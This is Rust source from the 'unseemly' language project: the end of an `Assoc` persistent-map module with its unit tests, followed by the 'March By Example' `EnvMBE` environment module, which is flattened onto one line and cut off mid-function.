    pub fn map<NewV: Clone, F>(&self, mut f: F) -> Assoc<K, NewV>
    where F: FnMut(&V) -> NewV {
        self.map_borrow_f(&mut f)
    }

    /// Like `map`, but takes the closure by mutable borrow,
    /// and the closure may borrow from `self`.
    pub fn map_borrow_f<'assoc, NewV: Clone, F>(&'assoc self, f: &mut F) -> Assoc<K, NewV>
    where F: FnMut(&'assoc V) -> NewV {
        Assoc::<K, NewV>::from_hamt(self.hamt.iter().map(|(k, ref v)| (k.clone(), f(v))).collect())
    }

    /// Like `map_borrow_f`, but `f` also gets to see the key.
    pub fn keyed_map_borrow_f<NewV: Clone, F>(&self, f: &mut F) -> Assoc<K, NewV>
    where F: FnMut(&K, &V) -> NewV {
        Assoc::<K, NewV>::from_hamt(
            self.hamt.iter().map(|(k, ref v)| (k.clone(), f(k, v))).collect(),
        )
    }

    /// Zips the two `Assoc`s together by key, applying `f` to each pair of values.
    /// Keys present in only one of the two are dropped (intersection semantics).
    pub fn map_with<OtherV: Clone, NewV: Clone>(
        &self,
        other: &Assoc<K, OtherV>,
        f: &dyn Fn(&V, &OtherV) -> NewV,
    ) -> Assoc<K, NewV> {
        Assoc::<K, NewV>::from_hamt(
            self.hamt
                .clone()
                .intersection_with_key(other.hamt.clone(), |_, ref v_l, ref v_r| f(v_l, v_r)),
        )
    }

    /// Like `map_with`, but `f` also gets to see the key.
    pub fn keyed_map_with<OtherV: Clone, NewV: Clone>(
        &self,
        other: &Assoc<K, OtherV>,
        f: &dyn Fn(&K, &V, &OtherV) -> NewV,
    ) -> Assoc<K, NewV> {
        Assoc::<K, NewV>::from_hamt(
            self.hamt
                .clone()
                .intersection_with_key(other.hamt.clone(), |ref k, ref v_l, ref v_r| {
                    f(k, v_l, v_r)
                }),
        )
    }

    /// Reverse lookup: finds some key bound to `target`
    /// (linear scan; which key wins on ties is unspecified).
    pub fn find_value<'assoc, 'f>(&'assoc self, target: &'f V) -> Option<&'assoc K>
    where V: PartialEq {
        self.hamt.iter().find(|(_, v)| v == &target).map(|(k, _)| k)
    }

    /// Like `find`, but raises an internal compiler panic on a missing key.
    pub fn find_or_panic<'assoc, 'f>(&'assoc self, target: &'f K) -> &'assoc V
    where K: fmt::Display {
        self.find(target).unwrap_or_else(|| icp!("'{}' not found in {}", target, self.map(|_| "…")))
    }

    /// In-place removal, returning the old value (if any).
    /// NOTE(review): like `mut_set`, keeps the old `id`.
    pub fn remove<'assoc, 'f>(&'assoc mut self, target: &'f K) -> Option<V> {
        self.hamt.remove(target)
    }

    /// Like `remove`, but raises an internal compiler panic on a missing key.
    pub fn remove_or_panic<'assoc, 'f>(&'assoc mut self, target: &'f K) -> V
    where K: fmt::Display {
        self.hamt
            .remove(target)
            .unwrap_or_else(|| icp!("{} not found in {}", target, self.map(|_| "…")))
    }

    // Generates a version of `self` that lacks the entries that have identical values in `other`
    pub fn cut_common(&self, other: &Assoc<K, V>) -> Assoc<K, V>
    where V: PartialEq {
        let mut hamt = self.hamt.clone();
        hamt.retain(|k, v| other.find(k) != Some(v));
        Self::from_hamt(hamt)
    }

    /// Returns a new `Assoc` with no binding for `k` (a no-op if `k` was unbound).
    pub fn unset(&self, k: &K) -> Assoc<K, V> { Self::from_hamt(self.hamt.without(k)) }

    /// Folds `red` over all entries, starting from `base` (entry order unspecified).
    pub fn reduce<Out>(&self, red: &dyn Fn(&K, &V, Out) -> Out, base: Out) -> Out {
        self.hamt.iter().fold(base, |base, (k, v)| red(k, v, base))
    }
}

impl<K: Eq + Hash + Clone, V: Clone> Assoc<K, V> {
    /// Cheap identity check: a conservative approximation of pointer equality,
    /// based on the `id` stamped by `from_hamt`. Used by `earley.rs` as an
    /// optimization; may report `false` for structurally-equal `Assoc`s.
    pub fn almost_ptr_eq(&self, other: &Assoc<K, V>) -> bool {
        self.id == other.id // Only true if they are clones of each other
    }
}

impl<K: Eq + Hash + Clone, V: Clone, E: Clone> Assoc<K, Result<V, E>> {
    /// Turns an `Assoc` of `Result`s into a `Result` of an `Assoc`,
    /// short-circuiting on the first `Err` encountered (entry order unspecified).
    pub fn lift_result(self) -> Result<Assoc<K, V>, E> {
        let mut oks = vec![];
        for (k, res_v) in self.hamt.into_iter() {
            oks.push((k, res_v?))
        }
        Ok(Assoc::<K, V>::from_hamt(HashMap::from(oks)))
    }
}

#[test]
fn basic_assoc() {
    let mt: Assoc<i32, i32> = Assoc::new();
    let a1 = mt.set(5, 6);
    let a2 = a1.set(6, 7);
    let a_override = a2.set(5, 500);

    assert_eq!(mt.find(&5), None);
    assert_eq!(a1.find(&6), None);
    assert_eq!(a2.find(&999), None);
    assert_eq!(a_override.find(&999), None);
    assert_eq!(a1.find(&5), Some(&6));
    assert_eq!(a2.find(&5), Some(&6));
    assert_eq!(a2.find(&6), Some(&7));
    assert_eq!(a2.find(&5), Some(&6));
    assert_eq!(a_override.find(&5), Some(&500));
    assert_eq!(a_override.find(&6), Some(&7));

    assert_eq!(a_override.unset(&5).find(&5), None);
    assert_eq!(a_override.unset(&6).find(&6), None);
    assert_eq!(a_override.unset(&6).find(&5), Some(&500));
    assert_eq!(a_override.unset(&5).find(&6), Some(&7));
    // Unsetting an absent key is a no-op:
    assert_eq!(a_override.unset(&-111).find(&5), Some(&500));
}

#[test]
fn assoc_equality() {
    let mt: Assoc<i32, i32> = Assoc::new();
    let a1 = mt.set(5, 6);
    let a2 = a1.set(6, 7);
    let a_override = a2.set(5, 500);

    // Same contents, built in a different insertion order:
    let a2_opposite = mt.set(6, 7).set(5, 6);
    let a_override_direct = mt.set(5, 500).set(6, 7);

    assert_eq!(mt, Assoc::new());
    assert_eq!(a1, a1);
    assert!(a1 != mt);
    assert!(mt != a1);
    assert_eq!(a2, a2);
    assert_eq!(a2, a2_opposite);
    assert_eq!(a_override, a_override_direct);
    assert!(a2 != a_override);

    let a1_again = mt.set(5, 6);

    // Nothing shared: no-op
    assert_eq!(mt.cut_common(&mt), mt);
    assert_eq!(a1.cut_common(&mt), a1);
    assert_eq!(mt.cut_common(&a1), mt);

    // Everything shared: empty result
    assert_eq!(a1_again.cut_common(&a1), mt);
    assert_eq!(a_override_direct.cut_common(&a_override), mt);
    assert_eq!(a_override.cut_common(&a_override_direct), mt);
    assert_eq!(a1.cut_common(&a1), mt);
    assert_eq!(a2.cut_common(&a2), mt);

    // Partial share:
    assert_eq!(a2.cut_common(&a1), mt.set(6, 7));
    assert_eq!(a_override.cut_common(&a2), mt.set(5, 500));

    assert!(mt.almost_ptr_eq(&mt));
    assert!(a2.almost_ptr_eq(&a2));
    assert!(a_override_direct.almost_ptr_eq(&a_override_direct));
    assert!(!a2.almost_ptr_eq(&a2_opposite));
    // assert!(mt.almost_ptr_eq(&Assoc::new()));
}

#[test]
fn assoc_r_and_r_roundtrip() {
    use num::BigInt;
    let mt: Assoc<BigInt, BigInt> = Assoc::new();
    let a1 = mt.set(BigInt::from(5), BigInt::from(6));
    let a2 = a1.set(BigInt::from(6), BigInt::from(7));

    // `reflect ∘ reify` should be the identity (up to `PartialEq`).
    assert_eq!(mt, Assoc::<BigInt, BigInt>::reflect(&mt.reify()));
    assert_eq!(a2, Assoc::<BigInt, BigInt>::reflect(&a2.reify()));
}

#[test]
fn assoc_map() {
    let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3);
    assert_eq!(a1.map(|a| a + 1), assoc_n!("x" => 2, "y" => 3, "z" => 4));

    let a2 = assoc_n!("y" => -2, "z" => -3, "x" => -1);
    assert_eq!(a1.map_with(&a2, &|a, b| a + b), assoc_n!("x" => 0, "y" => 0, "z" => 0));
}

#[test]
fn assoc_reduce() {
    let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3);
    assert_eq!(a1.reduce(&|_key, a, b| a + b, 0), 6);

    let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3);
    assert_eq!(a1.reduce(&|key, a, b| if key.is("y") { b } else { a + b }, 0), 4);
}
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/mbe.rs
src/util/mbe.rs
#![macro_use] // March By Example: a user-friendly way to handle named subterms under Kleene stars, // expressed through a special kind of environment. // This is intended to organize the subterms of an `Ast` node. // Using this as the evaluation environment of a program is probably interesting, // but not necessarily in a good way. // // // The principle, when applied to pattern-based macro definitions, is as follows: // Kleene stars in a macro grammar // (e.g. `[f=Identifier [arg=Identifier ":" arg_t=Type]*]` ) // correspond to lists in an AST. // The original syntactic structure is irrelevant. // but there's only one name (e.g. `arg_t`) for the entire list of matched syntax. // // This whole thing nicely generalizes to nesting: we use variable-arity trees instead of lists, // resulting in an `EnvMBE` (a March By Example Enviornment) // // For getting information *out* of an `EnvMBE`, // we provide an operation ("march") that, given a set of names // ("driving names", presumably the names "under the `*`") // produces `n` environments, in which each of those names has a tree // that is shorter by one level. // // One problem: what if two of the "driving names" repeat a different numbers of times? // Traditionally, this is a runtime error, // but we'd like it to be a parser error: // after all, it's the author of the syntax // who has control over how many repetions there are of each thing. // So, we will let grammars specify when different Kleene stars // must repeat the same number of times. // Violations of this rule are a parse error, // and it's only legal to "march" with driving names // that were matched (at the current level) // (a) under the same `*`, or // (b) under `*`s that must repeat the same number of times. // On the other hand, if the user wants "cross product" behavior, // there's no reason that they can't get it. // We may add a facility to take syntax matched `a`, `b`, `c`... times, // and produce `a × b × c` different environments. 
// // // This is based on Macro By Example, but this implementation isn't strictly about macros, // which is why I changed the name! // The original MBE paper is // "Macro-by-example: Deriving syntactic transformations from their specifications" // by Kohlbecker and Wand // ftp://www.cs.indiana.edu/pub/techreports/TR206.pdf // // Many interesting macros can be defined simply // by specifying a grammar and a piece of quoted syntax, // if the syntax transcription supports MBE. // (This corresponds to Scheme's `syntax-rules` and Rust's `macro-rules`.) use crate::{name::*, util::assoc::Assoc}; use std::{fmt, rc::Rc}; // How on earth can one data structure need so many variations on `map`? // There's got to be a better way! /// `EnvMBE` is like an environment, /// except that some of its contents are "repeats", /// which represent _n_ different values /// (or repeats of repeats, etc.). /// Non-repeated values may be retrieved by `get_leaf`. /// To access repeated values, one must `march` them, /// which produces _n_ different environments, /// in which the marched values are not repeated (or one layer less repeated). /// Marching multiple repeated values at once /// is only permitted if they were constructed to repeat the same number of times. #[derive(Eq, Clone, Default)] // `Clone` needs to traverse the whole `Vec` ): pub struct EnvMBE<T: Clone> { /// Non-repeated values leaves: Assoc<Name, T>, /// Outer vec holds distinct repetitions /// (i.e. differently-named, or entirely unnamed repetitions) /// Note that some of the entries may be obsolete; /// deletions are marked by putting `None` in the `Assoc`s /// that index into this. repeats: Vec<Rc<Vec<EnvMBE<T>>>>, /// Where in `repeats` to look, if we want to traverse for a particular leaf. /// We use `.unwrap_or(None)` when looking up into this /// so we can delete by storing `None`. leaf_locations: Assoc<Name, Option<usize>>, /// The location in `repeats` that represents a specific repetition name. 
named_repeats: Assoc<Name, Option<usize>>, } // `custom_derive!` (or maybe `Reifiable!`) can't handle type bounds, so we need to do this manually impl<T: Clone + crate::runtime::reify::Reifiable> crate::runtime::reify::Reifiable for EnvMBE<T> { fn ty_name() -> Name { n("EnvMBE") } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Value::Sequence(vec![ Rc::new(self.leaves.reify()), Rc::new(self.repeats.reify()), Rc::new(self.leaf_locations.reify()), Rc::new(self.named_repeats.reify()), ]) } fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => { EnvMBE { leaves: <Assoc<Name, T>>::reflect(&*parts[0]), repeats: <Vec<Rc<Vec<EnvMBE<T>>>>>::reflect(&*parts[1]), leaf_locations: <Assoc<Name, Option<usize>>>::reflect(&*parts[2]), named_repeats: <Assoc<Name, Option<usize>>>::reflect(&*parts[3]) } }) } } impl<T: PartialEq + Clone> PartialEq for EnvMBE<T> { fn eq(&self, other: &EnvMBE<T>) -> bool { fn assoc_eq_modulo_none<K: Eq + std::hash::Hash + Clone, V: PartialEq + Clone>( lhs: &Assoc<K, Option<V>>, rhs: &Assoc<K, Option<V>>, ) -> bool { for (k, v_maybe) in lhs.iter_pairs() { if let Some(ref v) = *v_maybe { if let Some(&Some(ref other_v)) = rhs.find(k) { if !(v == other_v) { return false; } } else { return false; } } } for (other_k, other_v_maybe) in rhs.iter_pairs() { if let Some(ref other_v) = *other_v_maybe { if let Some(&Some(ref v)) = rhs.find(other_k) { if !(v == other_v) { return false; } } else { return false; } } } true } // This ought to handle permutations of `repeats` // (matched with permutations of the indices in the assocs) // but that's hard. 
self.leaves == other.leaves && self.repeats == other.repeats && assoc_eq_modulo_none(&self.leaf_locations, &other.leaf_locations) && assoc_eq_modulo_none(&self.named_repeats, &other.named_repeats) } } impl<T: Clone + fmt::Debug> fmt::Debug for EnvMBE<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.leaves.empty() && self.repeats.is_empty() { write!(f, "mbe∅") } else { write!(f, "{{ 🍂 {:#?}, ✶", self.leaves)?; let mut first = true; for (i, rep) in self.repeats.iter().enumerate() { if !first { write!(f, ", ")?; } first = false; // is it a named repeat? for (name, idx_maybe) in self.named_repeats.iter_pairs() { if let Some(idx) = *idx_maybe { if idx == i { write!(f, "⋯({:#?})⋯ ", name)?; } } } write!(f, "{:#?}", rep)?; } write!(f, "}}") } } } impl<T: Clone + fmt::Display> fmt::Display for EnvMBE<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.leaves.empty() && self.repeats.is_empty() { write!(f, "∅") } else { write!(f, "{{MBE {}, ✶", self.leaves)?; let mut first = true; for (i, rep) in self.repeats.iter().enumerate() { if !first { write!(f, ", ")?; } first = false; // is it a named repeat? 
for (name, idx_maybe) in self.named_repeats.iter_pairs() { if let Some(idx) = *idx_maybe { if idx == i { write!(f, "⋯({})⋯ ", name)?; } } } for mbe in &**rep { write!(f, "{} ", mbe)?; } } write!(f, "}}") } } } impl<T: Clone> EnvMBE<T> { pub fn new() -> EnvMBE<T> { EnvMBE { leaves: Assoc::new(), repeats: vec![], leaf_locations: Assoc::new(), named_repeats: Assoc::new(), } } /// Creates an `EnvMBE` without any repetition pub fn new_from_leaves(l: Assoc<Name, T>) -> EnvMBE<T> { EnvMBE { leaves: l, repeats: vec![], leaf_locations: Assoc::new(), named_repeats: Assoc::new(), } } /// Creates an `EnvMBE` containing a single anonymous repeat /// (HACK: there's no way to represent a name repeating zero times this way; /// use `new_from_empty_anon_repeat`) pub fn new_from_anon_repeat(r: Vec<EnvMBE<T>>) -> EnvMBE<T> { let mut res = EnvMBE::new(); res.add_anon_repeat(r); res } /// Creates an `EnvMBE` containing a single named repeat /// (HACK: there's no way to represent a name repeating zero times this way; /// use `new_from_empty_named_repeat`) pub fn new_from_named_repeat(n: Name, r: Vec<EnvMBE<T>>) -> EnvMBE<T> { let mut res = EnvMBE::new(); res.add_named_repeat(n, r); res } pub fn new_from_empty_anon_repeat(ks: &[Name]) -> EnvMBE<T> { let mut res = EnvMBE::new(); for k in ks { res.leaf_locations.mut_set(*k, Some(0)); } res.repeats.push(Rc::new(vec![])); res } pub fn new_from_empty_named_repeat(n: Name, ks: &[Name]) -> EnvMBE<T> { let mut res = EnvMBE::new(); for k in ks { res.leaf_locations.mut_set(*k, Some(0)); } res.repeats.push(Rc::new(vec![])); res.named_repeats.mut_set(n, Some(0)); res } /// Combine two `EnvMBE`s whose names (both environment names and repeat names) are disjoint, /// or just overwrite the contents of the previous one. /// This should maybe not be `pub` if we can avoid it. /// Note: ideally, the larger one should be on the LHS. 
pub fn combine_overriding(&self, rhs: &EnvMBE<T>) -> EnvMBE<T> { let adjust_rhs_by = self.repeats.len(); let mut new_repeats = self.repeats.clone(); new_repeats.append(&mut rhs.repeats.clone()); EnvMBE { leaves: self.leaves.set_assoc(&rhs.leaves), repeats: new_repeats, leaf_locations: self.leaf_locations.set_assoc( &rhs.leaf_locations.map(|idx_opt| idx_opt.map(|idx| idx + adjust_rhs_by)), ), named_repeats: self.named_repeats.set_assoc( &rhs.named_repeats.map(|idx_opt| idx_opt.map(|idx| idx + adjust_rhs_by)), ), } } /// Combine two `EnvMBE`s whose leaves should be disjoint, but which can contain /// named repeats with the same name. This should make sense for combining the results of /// matching two different chunks of a patern. pub fn merge(&self, rhs: &EnvMBE<T>) -> EnvMBE<T> { let mut res = self.clone(); let mut rhs_idx_is_named: Vec<bool> = rhs.repeats.iter().map(|_| false).collect(); // This could be made more efficient by just reusing the `Rc`s instead of cloning the // arrays, but that would require reworking the interface. for (n, rep_idx) in rhs.named_repeats.iter_pairs() { if let Some(rep_idx) = *rep_idx { if rhs.repeats[rep_idx].len() > 0 { res.add_named_repeat(*n, (*rhs.repeats[rep_idx]).clone()); } else { // Maybe pull this out as `.add_empty_named_repeat`? 
let empty_idx = if let Some(Some(rep_idx)) = res.named_repeats.find(n) { if res.repeats[*rep_idx].len() != 0 { panic!("Length mismatch; {} is supposed to repeat empty", n); } *rep_idx } else { let new_idx = res.repeats.len(); res.repeats.push(Rc::new(vec![])); res.named_repeats.mut_set(*n, Some(new_idx)); new_idx }; for (leaf_name, leaf_loc) in rhs.leaf_locations.iter_pairs() { if leaf_loc == &Some(rep_idx) { res.leaf_locations.mut_set(*leaf_name, Some(empty_idx)); } } } rhs_idx_is_named[rep_idx] = true; } } for (idx, rep) in rhs.repeats.iter().enumerate() { if !rhs_idx_is_named[idx] { if rep.len() > 0 { res.add_anon_repeat((**rep).clone()); } else { // Maybe pull this out as `.addempty__anon_repeat`? let empty_idx = res.repeats.len(); res.repeats.push(Rc::new(vec![])); for (leaf_name, leaf_loc) in rhs.leaf_locations.iter_pairs() { if leaf_loc == &Some(idx) { res.leaf_locations.mut_set(*leaf_name, Some(empty_idx)); } } } } } res.leaves = res.leaves.set_assoc(&rhs.leaves); res } /// Given `driving_names`, marches the whole set of names that can march with them. /// (Adding an additional name to `driving_names` will result in the same behavior, /// or a panic, in the case that the new name can't be marched with the existing ones.) /// /// This takes a `Vec` of `Name` instead of just one because a particular name might /// not be transcribed at all here, and thus can't tell us how to repeat. 
pub fn march_all(&self, driving_names: &[Name]) -> Vec<EnvMBE<T>> { let mut march_loc: Option<(usize, Name)> = None; for &n in driving_names { match (march_loc, self.leaf_locations.find(&n).unwrap_or(&None)) { (_, &None) => {} (None, &Some(loc)) => march_loc = Some((loc, n)), (Some((old_loc, old_name)), &Some(new_loc)) => { if old_loc != new_loc { panic!( "{:#?} and {:#?} cannot march together; they weren't matched to have \ the same number of repeats", old_name, n ); } } } } let march_loc = match march_loc { None => { return vec![]; } // FOOTGUN: assume that it is repeated zero times Some((loc, _)) => loc, }; let mut result = vec![]; for marched_out in self.repeats[march_loc].iter() { // TODO: should we allow cross-product marching by keeping around unused repeats? // Don't lose the current leaves: result .push(EnvMBE::new_from_leaves(self.leaves.clone()).combine_overriding(marched_out)); } result } /// Get a non-repeated thing in the enviornment pub fn get_leaf(&self, n: Name) -> Option<&T> { self.leaves.find(&n) } pub fn get_rep_leaf(&self, n: Name) -> Option<Vec<&T>> { // FOOTGUN: can't distinguish wrong leaf names from 0-repeated leaves // TODO: remove get_rep_leaf_or_panic, as this never returns `None` let mut res = vec![]; let leaf_loc = match self.leaf_locations.find(&n) { Some(&Some(ll)) => ll, _ => { return Some(vec![]); } }; for r in &*self.repeats[leaf_loc] { match r.get_leaf(n) { Some(leaf) => res.push(leaf), None => { return Some(vec![]); } // `march` can leave us with dead leaf_locations } } Some(res) } /// Extend with a non-repeated thing pub fn add_leaf(&mut self, n: Name, v: T) { self.leaves = self.leaves.set(n, v); } pub fn add_named_repeat(&mut self, n: Name, sub: Vec<EnvMBE<T>>) { if sub.is_empty() { return; } // no-op-ish, but keep the repeats clean (good for `eq`) match *self.named_repeats.find(&n).unwrap_or(&None) { None => { let new_index = self.repeats.len(); self.update_leaf_locs(new_index, &sub); self.repeats.push(Rc::new(sub)); 
self.named_repeats = self.named_repeats.set(n, Some(new_index)); } Some(idx) => { if self.repeats[idx].len() != sub.len() { panic!( "Named repetition {:#?} is repeated {:#?} times in one place, {:#?} times \ in another.", n, self.repeats[idx].len(), sub.len() ) } self.update_leaf_locs(idx, &sub); let mut new_repeats_at_idx = vec![]; for pairs in self.repeats[idx].iter().zip(sub.iter()) { new_repeats_at_idx.push(pairs.0.combine_overriding(pairs.1)); } self.repeats[idx] = Rc::new(new_repeats_at_idx); } } } pub fn add_anon_repeat(&mut self, sub: Vec<EnvMBE<T>>) { if sub.is_empty() { return; } // no-op-ish, but keep the repeats clean (good for `eq`) let new_index = self.repeats.len(); self.update_leaf_locs(new_index, &sub); self.repeats.push(Rc::new(sub)); } pub fn anonimize_repeat(&mut self, n: Name) { // Now you can't find me! self.named_repeats = self.named_repeats.set(n, None); } pub fn map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(&T) -> NewT { self.named_map(&mut |_n, elt| f(elt)) } /// Map, but march the `ctxt` along with the structure of `self` pub fn map_marched_against<NewT: Clone, Mode: crate::walk_mode::WalkMode, F>( &self, f: &mut F, ctxt: &crate::ast_walk::LazyWalkReses<Mode>, ) -> EnvMBE<NewT> where F: FnMut(&T, &crate::ast_walk::LazyWalkReses<Mode>) -> NewT, { EnvMBE { leaves: self.leaves.map_borrow_f(&mut |t: &T| f(t, ctxt)), repeats: self .repeats .iter() .enumerate() .map(|(rpt_idx, rc_vec_mbe): (usize, &Rc<Vec<EnvMBE<T>>>)| { let marched_ctxts = match self.leaf_locations.find_value(&Some(rpt_idx)) { Some(this_rpt_name) => ctxt.march_all(&[*this_rpt_name]), None => { // This repeat has no leaves. 
let mut res = vec![]; res.resize(rc_vec_mbe.len(), ctxt.clone()); res } }; Rc::new( rc_vec_mbe .iter() .zip(marched_ctxts) .map( |(mbe, marched_ctxt): ( &EnvMBE<T>, crate::ast_walk::LazyWalkReses<Mode>, )| { mbe.map_marched_against(f, &marched_ctxt) }, ) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn named_map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(&Name, &T) -> NewT { EnvMBE { leaves: self.leaves.keyed_map_borrow_f(f), repeats: self .repeats .iter() .map(|rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { Rc::new(rc_vec_mbe.iter().map(|mbe: &EnvMBE<T>| mbe.named_map(f)).collect()) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn map_reduce<NewT: Clone>( &self, f: &dyn Fn(&T) -> NewT, red: &dyn Fn(&NewT, &NewT) -> NewT, base: NewT, ) -> NewT { let reduced: NewT = self.leaves.map(f).reduce(&|_k, v, res| red(v, &res), base); self.repeats.iter().fold(reduced, |base: NewT, rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { rc_vec_mbe.iter().fold(base, |base: NewT, mbe: &EnvMBE<T>| mbe.map_reduce(f, red, base)) }) } /// Provide the map function with the name of the current leaf, /// and the appropriately-marched context element pub fn marched_map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(Name, &EnvMBE<T>, &T) -> NewT { self.marched_map_rec(self, f) } fn marched_map_rec<NewT: Clone, F>(&self, outer: &EnvMBE<T>, f: &mut F) -> EnvMBE<NewT> where F: FnMut(Name, &EnvMBE<T>, &T) -> NewT { let local_mbe = outer.combine_overriding(self); let new_leaves = self.leaves.keyed_map_borrow_f(&mut |n: &Name, elt: &T| f(*n, &local_mbe, elt)); EnvMBE { leaves: new_leaves, repeats: self .repeats .iter() .map(|rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { Rc::new( rc_vec_mbe .iter() .map(|marched_out: &EnvMBE<T>| marched_out.marched_map_rec(outer, f)) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: 
self.named_repeats.clone(), } } // TODO: we should just have the relevant functions return None... pub fn can_map_with(&self, o: &EnvMBE<T>) -> bool { let mut lhs_keys = std::collections::HashSet::<Name>::new(); for (k, _) in self.leaves.iter_pairs() { lhs_keys.insert(*k); } let mut rhs_keys = std::collections::HashSet::<Name>::new(); for (k, _) in o.leaves.iter_pairs() { rhs_keys.insert(*k); } if lhs_keys != rhs_keys { return false; } if self.repeats.len() != o.repeats.len() { return false; } for (subs, o_subs) in self.repeats.iter().zip(o.repeats.iter()) { if subs.len() != o_subs.len() { return false; } for (mbe, o_mbe) in subs.iter().zip(o_subs.iter()) { if !mbe.can_map_with(o_mbe) { return false; } } } true } pub fn map_with<S: Clone, NewT: Clone>( &self, o: &EnvMBE<S>, f: &dyn Fn(&T, &S) -> NewT, ) -> EnvMBE<NewT> { self.named_map_with(o, &|_name, l, r| f(l, r)) } pub fn named_map_with<S: Clone, NewT: Clone>( &self, o: &EnvMBE<S>, f: &dyn Fn(&Name, &T, &S) -> NewT, ) -> EnvMBE<NewT> { EnvMBE { leaves: self.leaves.keyed_map_with(&o.leaves, f), // This assumes that "equivalent" repeats have the same indices... 
) : repeats: self .repeats .iter() .zip(o.repeats.iter()) .map(&|(rc_vec_mbe, o_rc_vec_mbe): (&Rc<Vec<EnvMBE<T>>>, &Rc<Vec<EnvMBE<S>>>)| { Rc::new( rc_vec_mbe .iter() .zip(o_rc_vec_mbe.iter()) .map(|(mbe, o_mbe)| mbe.named_map_with(o_mbe, f)) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn map_reduce_with<S: Clone, NewT: Clone>( &self, other: &EnvMBE<S>, f: &dyn Fn(&T, &S) -> NewT, red: &dyn Fn(NewT, NewT) -> NewT, base: NewT, ) -> NewT { // TODO #15: this panics all over the place if anything goes wrong let mut reduced: NewT = self.leaves.map_with(&other.leaves, f).reduce(&|_k, v, res| red(v.clone(), res), base); let mut already_processed: Vec<bool> = self.repeats.iter().map(|_| false).collect(); for (leaf_name, self_idx) in self.leaf_locations.iter_pairs() { let self_idx = match *self_idx { Some(si) => si, None => { continue; } }; if already_processed[self_idx] { continue; } already_processed[self_idx] = true; let other_idx = other.leaf_locations.find_or_panic(leaf_name).unwrap(); for (self_elt, other_elt) in self.repeats[self_idx].iter().zip(other.repeats[other_idx].iter()) { reduced = self_elt.map_reduce_with(other_elt, f, &red, reduced); } } reduced } fn update_leaf_locs(&mut self, idx: usize, sub: &[EnvMBE<T>]) { let mut already_placed_leaves = std::collections::HashSet::<Name>::new(); let mut already_placed_repeats = std::collections::HashSet::<Name>::new(); for sub_mbe in sub { for leaf_name in sub_mbe.leaf_locations.iter_keys().chain(sub_mbe.leaves.iter_keys()) { if !already_placed_leaves.contains(leaf_name) { self.leaf_locations = self.leaf_locations.set(*leaf_name, Some(idx)); already_placed_leaves.insert(*leaf_name); } } for repeat_name in sub_mbe.named_repeats.iter_keys() { if !already_placed_repeats.contains(repeat_name) { self.named_repeats = self.named_repeats.set(*repeat_name, Some(idx)); already_placed_repeats.insert(*repeat_name); } } } } // If `f` turns a leaf into a 
`Vec`, splice those results in pub fn heal_splices<E>( &mut self, f: &dyn Fn(&T) -> Result<Option<Vec<T>>, E>, ) -> Result<(), E> { for repeat in &mut self.repeats { let mut cur_repeat: Vec<EnvMBE<T>> = (**repeat).clone(); let mut i = 0; while i < cur_repeat.len() { cur_repeat[i].heal_splices(f)?; let mut splices = vec![]; { let n_and_vals = cur_repeat[i].leaves.iter_pairs(); for (n, val) in n_and_vals { if let Some(splice) = f(val)? { splices.push((*n, splice)); } } } if !splices.is_empty() { let mut template = cur_repeat.remove(i); // TODO: each of the splices better be the same length. // I don't know what has to go wrong to violate that rule. for rep in 0..splices[0].1.len() { for splice in &splices { template.add_leaf(splice.0, splice.1[rep].clone()); } cur_repeat.insert(i + rep, template.clone()) } i += splices[0].1.len(); } else { i += 1; } } *repeat = Rc::new(cur_repeat) } Ok(()) } // TODO: this should return a usable error pub fn heal_splices__with<E, S: Clone>( &mut self, other: &EnvMBE<S>, f: &dyn Fn(&T, &dyn Fn() -> Vec<S>) -> Result<Option<Vec<T>>, E>, ) -> Result<(), E> where T: std::fmt::Debug, { for repeat in &mut self.repeats { // Find the same repeat in `other`: let mut names_needed = vec![]; for (name, _) in self.leaf_locations.iter_pairs() { names_needed.push(name); } let other__rep_loc = match other.leaf_locations.find(names_needed[0]) { Some(Some(l)) => *l, _ => { return Ok(()); // Should become a mismatch error elsewhere (TODO: make an `E`) } }; let other__cur_repeat: &Vec<EnvMBE<S>> = &*other.repeats[other__rep_loc]; let mut cur_repeat: Vec<EnvMBE<T>> = (**repeat).clone(); // If an item splices, how wide does the other side need to be // in order to make everything line up? 
let splice_length = (other__cur_repeat.len() + 1).checked_sub(cur_repeat.len()).unwrap(); let mut i = 0; let mut other_i = 0; while i < cur_repeat.len() && other_i < other__cur_repeat.len() { cur_repeat[i].heal_splices__with(&other__cur_repeat[other_i], f)?; let mut splices = vec![]; { let n_and_vals = cur_repeat[i].leaves.iter_pairs(); for (n, val) in n_and_vals { let concrete_splice__thunk = || { let mut result = vec![]; for other_i in other__cur_repeat.iter().skip(i).take(splice_length) { result.push(other_i.leaves.find_or_panic(n).clone()) } result }; if let Some(splice) = f(val, &concrete_splice__thunk)? { splices.push((*n, splice)); } } } if !splices.is_empty() { let mut template = cur_repeat.remove(i); // TODO: each of the splices better be the same length. // I don't know what has to go wrong to violate that rule. for rep in 0..splices[0].1.len() { for splice in &splices { template.add_leaf(splice.0, splice.1[rep].clone()); } cur_repeat.insert(i + 